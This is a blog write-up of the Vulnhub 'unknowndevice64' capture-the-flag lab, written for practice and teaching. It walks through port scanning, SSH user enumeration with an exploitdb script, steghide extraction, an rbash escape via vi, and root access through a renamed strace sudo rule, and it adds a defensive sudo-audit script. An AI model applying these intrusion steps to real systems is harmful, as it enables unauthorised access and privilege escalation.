Hello comrade,
This week, little gopnik, training on Vulnhub. Yep, again, because practice makes perfect. Period.


Description:
unknowndevice64 v1.0 is a medium level boot2root challenge. The OVA has been tested on both VMware and Virtual Box.
Difficulty: Intermediate
Flags: Your Goal is to get root and read /root/flag.txt
Networking:
DHCP: Enabled
IP Address: Automatically assigned
Hint: Follow your intuitions ... and enumerate! and for any questions, feel free to contact me on Twitter: @unknowndevice64
Happy Hacking..!!

Url: https://www.vulnhub.com/entry/unknowndevice64-1,293/


If you need a little memo about pentest tools, check mine (almost regularly updated).

Setup

My target is at 192.168.56.108

Port scan

nmap -p- -sS -sV 192.168.56.108

I've shrunk the output a little bit.

PORT      STATE SERVICE VERSION
1337/tcp  open  ssh     OpenSSH 7.7 (protocol 2.0)
31337/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.14)

SimpleHTTPServer

In most cases, a web server is a good starting point for a pentest.

I looked at the source code of the page and found this:

That led me to the following page:

And that's it... Nothing more.

That's all folks (really ?)

I've tried to find hidden files on the server:

nikto -h http://192.168.56.108:31337/

=> Nothing

dirb http://192.168.56.108:31337 /usr/share/dirb/wordlists/common.txt

=> Nothing

gobuster -u http://192.168.56.108:31337/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php

=> Nothing

I searched for metadata in key_is_h1dd3n.jpg => Nothing

Extracted all frames of the GIF on the main page (http://192.168.56.108:31337/ud64.gif).

# Extract frames of gif files
convert ud64.gif out%05d.pgm

# Display all images (1 by 1)
feh

Tried StegSolve tool on key_is_h1dd3n.jpg => Nothing

I started to tell myself that I had to take a look at the SSH server.

Use an exploit from exploitdb.com ?

To make it quick, I found an exploit that allows enumerating the users available on the system.

NB: In order to use this exploit you need to modify line 77 and add an int conversion as follows:

sock.connect((args.target, int(args.port)))

Once everything works you can enumerate users on the target.

python ssh_enum_user.py -p 1337 192.168.56.108 root
[+] root is a valid username

python ssh_enum_user.py -p 1337 192.168.56.108 unknowdevice64
[-] unknowdevice64 is an invalid username

python ssh_enum_user.py -p 1337 192.168.56.108 ud64
[+] ud64 is a valid username

I was surprised that the challenge requires the use of a famous, not-so-old exploit from exploitdb. After all, the challenge was published on 9 Mar 2019 and the exploit was published on 17 Aug 2018 (after the NVD), so it is only 1 year old (almost).

But even with this exploit I still did not have access to the machine.

So I reviewed my notes and picked up from the beginning. I finally saw what I had missed: there must be a steganography process on the image, one that I have not tested yet but which must be a little bit famous!

After a little search I found the tool I was looking for: steghide

# Using the passphrase: h1dden because of the filename
steghide --extract -sf key_is_h1dd3n.jpg

Finally I can continue !

So the hidden file is a BrainFuck program

cat h1dd3n.txt 
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.

Which, once decoded, gives me the password for the SSH access:

ud64:1M!#64@ud

SSH Access and rbash restriction

As you can see, this confirms that the exploit previously used actually works !

And boom ! Logged in !

When suddenly !

Oh no! not rbash! not again !

A thought then crossed my mind: the BrainFuck program plus the rbash, that makes a lot of coincidences to be chance...
Indeed, looking more closely, the previous Vulnhub challenge I did (Matrix) was created by the same guy as this one (@unknowndevice64), it's totally fortuitous!

So the rest of the challenge will be easier (that's why practice makes perfect).

In order to escape rbash I will use the same technique as for the Matrix challenge.

  1. run VI
  2. run :!/bin/sh from within VI

Now add some tools path...

export PATH=/bin:/usr/bin:$PATH

Get the root flag

After a little bit of recon, I found something interesting:

Item of interest

This means that we can execute the command /usr/bin/sysud64 as root without needing any password.

After a little bit of research I found that sysud64 is an alias for the command strace, which is used to trace system calls and signals.
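
From the defender's side, a sudo rule like this one slips past any review that only looks at command names, because the tool was renamed. The audit below is an added example, not part of the original write-up: it parses `sudo -l` output and compares each NOPASSWD binary by SHA-256 against trusted copies of tools that can start other programs. The sample output is constructed, and the function names, the `reference_tools` mapping and the presence of a trusted strace copy at a known path are assumptions.

```python
import hashlib
import re
from pathlib import Path

# Matches rule lines such as "    (ALL) NOPASSWD: /usr/bin/sysud64".
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s+NOPASSWD:\s*(?P<cmds>.+)$")

# Constructed sample of `sudo -l` output (not copied from the target).
SAMPLE = """User ud64 may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/sysud64
"""

def nopasswd_commands(sudo_l_output):
    """Return (runas, path) for every command a NOPASSWD rule allows."""
    pairs = []
    for line in sudo_l_output.splitlines():
        m = RULE.match(line)
        if m:
            for cmd in m.group("cmds").split(","):
                if cmd.strip():
                    pairs.append((m.group("runas"), cmd.split()[0]))
    return pairs

def digest(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def audit(sudo_l_output, reference_tools, root="/"):
    """Flag NOPASSWD commands that are, by name or by content, a tool able to
    start other programs. reference_tools maps a tool name to the path of a
    trusted copy (hypothetical paths; each must exist under root)."""
    root = Path(root)
    known = {digest(root / p.lstrip("/")): name
             for name, p in reference_tools.items()}
    findings = []
    for runas, cmd in nopasswd_commands(sudo_l_output):
        target = root / cmd.lstrip("/")
        if cmd == "ALL":
            findings.append((cmd, runas, "any command"))
        elif not target.is_file():
            findings.append((cmd, runas, "path missing"))
        elif target.name in reference_tools:
            findings.append((cmd, runas, target.name))
        elif digest(target) in known:  # same bytes under another name
            findings.append((cmd, runas, known[digest(target)] + " (renamed)"))
    return findings

if __name__ == "__main__":
    print(nopasswd_commands(SAMPLE))
```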

So let's dig into the manual of this tool to find a way to execute, let's say, bash commands.

Here we go !

Do your homework: RTFM

With this information in mind let's get the root flag !

sudo sysud64 -u root cat /root/flag.txt > /home/ud64/flagRoot.txt
sudo sysud64 -u root chmod 777 /home/ud64/flagRoot.txt
cat flagRoot.txt

     ___    _                _                                  
    / _ \  | |              | |                                 
   / /_\ \ | |__   __ _  ___| | _____ _ __                      
   |  _  | | '_ \ / _` |/ __| |/ / _ \ '__|                     
   | | | | | | | | (_| | (__|   <  __/ |                        
   \_| |_/ |_| |_|\__,_|\___|_|\_\___|_|                        

        _                    __             _                   
       | |                  / _|           | |                  
     __| | ___   ___  ___  | |_ ___  _ __  | | _____   _____    
    / _` |/ _ \ / _ \/ __| |  _/ _ \| '__| | |/ _ \ \ / / _ \   
   | (_| | (_) |  __/\__ \ | || (_) | |    | | (_) \ V /  __/   
    \__,_|\___/ \___||___/ |_| \___/|_|    |_|\___/ \_/ \___|   

             _           _           _   _                      
            | |         | |         | | | |                     
   __      _| |__   __ _| |_    ___ | |_| |__   ___ _ __ ___    
   \ \ /\ / / '_ \ / _` | __|  / _ \| __| '_ \ / _ \ '__/ __|   
    \ V  V /| | | | (_| | |_  | (_) | |_| | | |  __/ |  \__ \   
     \_/\_/ |_| |_|\__,_|\__|  \___/ \__|_| |_|\___|_|  |___/   

                        _     _               _         _       
                       | |   | |             | |       | |      
   __      _____  _   _| | __| |  _ __   ___ | |_    __| | ___  
   \ \ /\ / / _ \| | | | |/ _` | | '_ \ / _ \| __|  / _` |/ _ \
    \ V  V / (_) | |_| | | (_| | | | | | (_) | |_  | (_| | (_) |
     \_/\_/ \___/ \__,_|_|\__,_| |_| |_|\___/ \__|  \__,_|\___/


      __                                                         
    / _|                                                        
    | |_ ___  _ __   _ __ ___   ___  _ __   ___ _   _            
    |  _/ _ \| '__| | '_ ` _ \ / _ \| '_ \ / _ \ | | |           
    | || (_) | |    | | | | | | (_) | | | |  __/ |_| |_          
    |_| \___/|_|    |_| |_| |_|\___/|_| |_|\___|\__, (_)         
                                                 __/ |           
                                                |___/            

 _   _   _   _   _   _   _   _   _   _   _   _   _   _   _   _  _  
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( . | / | u | n | k | n | o | w | n | d | e | v | i | c | e | 6 |4 )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/

Conclusion

I resolved this challenge quickly.
I am a little disappointed, I was expecting something more difficult.
At least I can say that either I become better or I remember better what I did before.

I keep in mind the use of StegSolve for the next time!


Social stuff / Questions / Comments

Feel free to reach out or tip me!

Mail: a_ghost_soul@protonmail.com
Twitter: @GhostAgs

If you appreciate my work, please consider making a donation
Tipeee: https://fr.tipeee.com/ags-syndrome